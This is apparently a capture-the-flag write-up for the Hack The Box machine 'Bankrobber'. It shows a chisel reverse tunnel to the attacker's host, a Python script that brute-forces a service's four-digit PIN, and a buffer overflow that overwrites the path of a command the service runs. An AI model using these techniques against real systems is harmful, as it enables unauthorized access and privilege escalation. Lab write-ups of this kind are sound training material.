InfoSec LAB

Bankrobber_Bankv2

Created: 5 min read

Bankv2

While enumerating for networks, I discovered that the port 910 is up and listening. This wasn’t the case during the Recon phase. It likely due to the firewall

It has a PID of 1588

c:\Users\Cortin>Powershell -C ps -PID 1588
 
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName                                                  
-------  ------    -----      -----     ------     --  -- -----------                                                  
     58       5      624        284              1588   0 bankv2

There is a process, bankv2, with PID 1588. This process is responsible for the TCP listener on the port 910

c:\> dir
 Volume in drive C has no label.
 Volume Serial Number is 3307-A1DE
 
 directory of c:\
 
25-04-2019  16:50            57.937 bankv2.exe
24-04-2019  21:27    <DIR>          PerfLogs
21-10-2022  10:32    <DIR>          Program Files
21-10-2022  10:34    <DIR>          Program Files (x86)
24-04-2019  15:52    <DIR>          Users
11-01-2021  15:17    <DIR>          Windows
24-04-2019  21:18    <DIR>          xampp
               1 File(s)         57.937 bytes
               6 Dir(s)   5.207.052.288 bytes free

This must be it Unfortunately, there was nothing that I could do to interact with the binary. I couldn’t even read the binary permission bits let alone the execution

In order to interact with this bankv2 service, I would need to tunnel the route

Tunneling

C:\tmp>copy \\10.10.14.10\smb\chiselx64.exe .
copy \\10.10.14.10\smb\chiselx64.exe .
        1 file(s) copied.

Chisel transferred to the target system over SMB

┌──(kali㉿kali)-[~/archive/htb/labs/bankrobber]
└─$ chisel server -p 55555 --reverse
2023/01/24 04:16:39 server: Reverse tunnelling enabled

Starting a Chisel server on Kali port 55555

C:\tmp> chiselx64.exe client 10.10.14.10:55555 R:9100:910
 chiselx64.exe client 10.10.14.10:55555 R:9100:910
2023/01/24 02:17:18 client: Connecting to ws://10.10.14.10:55555
2023/01/24 02:17:18 client: Connected (Latency 31.0116ms)

From the target system, tunneling the port 910 to the Kali port 9100 by connecting to the Kali Chisel server on port 55555 The target port 910 should now be reachable through the Kali port 9100

┌──(kali㉿kali)-[~/archive/htb/labs/bankrobber]
└─$ nmap -p9100 127.0.0.1    
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-24 04:20 CET
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00015s latency).
 
PORT     STATE SERVICE
9100/tcp open  jetdirect
 
Nmap done: 1 IP address (1 host up) scanned in 0.02 seconds

It’s open. I can interact with the bankv2 service

Internet E-Coin Transfer System

┌──(kali㉿kali)-[~/…/htb/labs/bankrobber/bankv2]
└─$ nc 127.0.0.1 9100            
 --------------------------------------------------------------
 Internet E-Coin Transfer System
 International Bank of Sun church
                                        v0.1 by Gio & Cneeliz
 --------------------------------------------------------------
 please enter your super secret 4 digit pin code to login:
 [$]

Simply connecting to the service via Netcat reveals that it is a custom application. It claims to be Internet E-Coin Transfer System. I guess that it’s a command-line version of the web app

I tried to see how the app behaves by entering a 4-digit and it disconnects itself as the digits were denied This appears to be resolvable with brute-forcing

Python Brute-Forcer

┌──(kali㉿kali)-[~/…/htb/labs/bankrobber/bankv2]
└─$ cat bruteforcer.py 
#!/usr/bin/env python3
import socket, os, sys
 
host = str(input("Target Host: "))
port = int(input("Target Port: "))
 
i = 0
for i in range(10000):
    i += 1
    print(f"Attempting: {i:04d}")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))  
    s.recv(1024)
    i = "%04d" % i +"\n"
    pin = bytes(str(i), "ascii")
    s.send(pin)
    res = s.recv(1024)
    if b"Access denied" in res:
        continue
    else:
        print(f"\n\nAuthorized Digits Found: {pin.decode()}")
        break
        
    s.close()

I created a very simple Python script to brute-force the authentication

┌──(kali㉿kali)-[~/…/htb/labs/bankrobber/bankv2]
└─$ python3 bruteforcer.py
Target Host: 127.0.0.1
Target Port: 9100
Attempting: 0001
Attempting: 0002
Attempting: 0003
Attempting: 0004
Attempting: 0005
Attempting: 0006
Attempting: 0007
Attempting: 0008
Attempting: 0009
Attempting: 0010
Attempting: 0011
Attempting: 0012
Attempting: 0013
Attempting: 0014
Attempting: 0015
Attempting: 0016
Attempting: 0017
Attempting: 0018
Attempting: 0019
Attempting: 0020
Attempting: 0021
 
 
Authorized Digits Found: 0021

Executing the Python script reveals the correct 4 digits It’s 0021

transfer.exe

┌──(kali㉿kali)-[~/…/htb/labs/bankrobber/bankv2]
└─$ nc 127.0.0.1 9100
 --------------------------------------------------------------
 Internet E-Coin Transfer System
 International Bank of Sun church
                                        v0.1 by Gio & Cneeliz
 --------------------------------------------------------------
 please enter your super secret 4 digit pin code to login:
 [$] 0021
 [$] PIN is correct, access granted!
 --------------------------------------------------------------
 please enter the amount of e-coins you would like to transfer:
 [$] 10 
 [$] Transfering $10 using our e-coin transfer application. 
 [$] executing e-coin transfer tool: C:\Users\admin\Documents\transfer.exe
 
 [$] Transaction in progress, you can safely disconnect...

As I got authenticated, the app prompts for the amount of e-coins to transfer. i put 10 for testing and it appeared to be executing a binary, c:\Users\admin\Documents\transfer.exe, to transfer the amount.

c:\Users>cd admin
Toegang geweigerd.

i don’t have permissions to access the c:\Users\admin\ directory, let alone the binary

Buffer Overflow

┌──(kali㉿kali)-[~/…/htb/labs/bankrobber/bankv2]
└─$ nc 127.0.0.1 9100     
 --------------------------------------------------------------
 Internet E-Coin Transfer System
 International Bank of Sun church
                                        v0.1 by Gio & Cneeliz
 --------------------------------------------------------------
 Please enter your super secret 4 digit PIN code to login:
 [$] 0021
 [$] PIN is correct, access granted!
 --------------------------------------------------------------
 Please enter the amount of e-coins you would like to transfer:
 [$] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 [$] Transfering $AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA using our e-coin transfer application. 
 [$] Executing e-coin transfer tool: AAAAAAAAAAAAAAAAAA
 
 [$] Transaction in progress, you can safely disconnect...

While testing for buffer overflow, it does appear to be overflowing I placed 50 A’s into the amount, and it overwrote the original C:\Users\admin\Documents\transfer.exe with 18 A’s

Let me confirm this better way.

┌──(kali㉿kali)-[~/archive/htb/labs/bankrobber]
└─$ patterncreate -l 32       
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab

I generated a pattern of 32 characters

I will place the suffix of BufferOverflowed

Buffer Overflow is confirmed to be present at the amount parameter The confirmed length is 32 and the rest of input data has overwritten the transfer tool field. BufferOverflowed can be seen there.

There is a high change that the transfer tool field is being executed from a direct system command such as cmd.exe /c $transferTool If that is the case, I can overwrite the transfer tool field with my choice of payload This strongly appears to be a privilege escalation vector

Interactive Graph View

Backlinks